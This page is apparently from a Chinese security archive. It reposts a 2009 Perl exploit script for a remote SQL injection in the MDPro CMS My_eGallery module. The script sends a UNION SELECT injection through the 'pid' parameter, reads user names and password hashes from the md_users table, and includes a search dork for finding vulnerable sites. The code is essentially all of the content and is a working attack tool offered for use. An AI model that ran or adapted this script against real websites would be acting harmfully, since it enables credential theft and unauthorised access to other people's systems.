首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MDPro Module My_eGallery (pid) Remote SQL Injection Exploit
来源:staker[at]hotmail[dot]it 作者:StAkeR 发布时间:2009-02-24  
#!/usr/bin/perl

<<read;

    MDPro Module My_eGallery Remote SQL Injection Exploit
    by s3rg3770 && yeat - staker[at]hotmail[dot]it
   
    dork: inurl:module=My_eGallery pid
    note: works regardless of php.ini settings.
   
read

use IO::Socket;


my ($host,$path,$id) = @ARGV;


if (@ARGV != 3)
{
       print "\n+-------------------------------------------------------+\n".
             "\r| MDPro Module My_eGallery Remote SQL Injection Exploit |\n".
             "\r+-------------------------------------------------------+\n".
             "\rby yeat - staker[at]hotmail[dot]it\n".
             "\nUsage: perl $0 host /path/ id\n".
             "\nhost: localhost\n".
             "\rpath: /mdpro/\n".
             "\rid: 2\n";
       exit;
}        
else
{     
       my ($packet,$inject,$content);
      
       $inject = "index.php?module=My_eGallery&do=showpic&pid=-1".
                 "/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0".
                 ",0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7".
                 "230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0".
                 ",0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*";
                
       $socket = new IO::Socket::INET(
                                       PeerAddr => $host,
                                       PeerPort => 80,
                                       Proto    => 'tcp'
                                     ) or die $!;
                                       
      
       $packet .= "GET /$inject HTTP/1.1\r\n";
       $packet .= "Host: $host\r\n";
       $packet .= "User-Agent: Lynx (textmode)\r\n";
       $packet .= "Connection: close\r\n\r\n";
      
       $socket->send($packet);
      
       while (<$socket>) {
          $content .= $_;
       }
      
       close($socket);
      
       if ($content =~ /<r0x>(.+?)<r0x>/i) {
          print "Exploit Successful: $1\n";
       }
       else {
          print "Exploit Failed.\n";
       }     
}      


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Acrobat Reader JBIG2 Loc
·pPIM 1.0 Multiple Remote Vulne
·Pyrophobia 2.1.3.1 LFI Command
·Apple MACOS X xnu <= 1228.x Lo
·Free Arcade Script 1.0 LFI Com
·pPIM 1.01 (notes.php id) Remot
·Coppermine Photo Gallery <= 1.
·Mozilla Firefox 3.0.6 (BODY on
·POP Peeper 3.4.0.0 UIDL Remote
·Orbit <= 2.4 Long Hostname Rem
·Hex Workshop v6 (.HEX File) Lo
·Demium CMS 0.2.1B Multiple Vul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved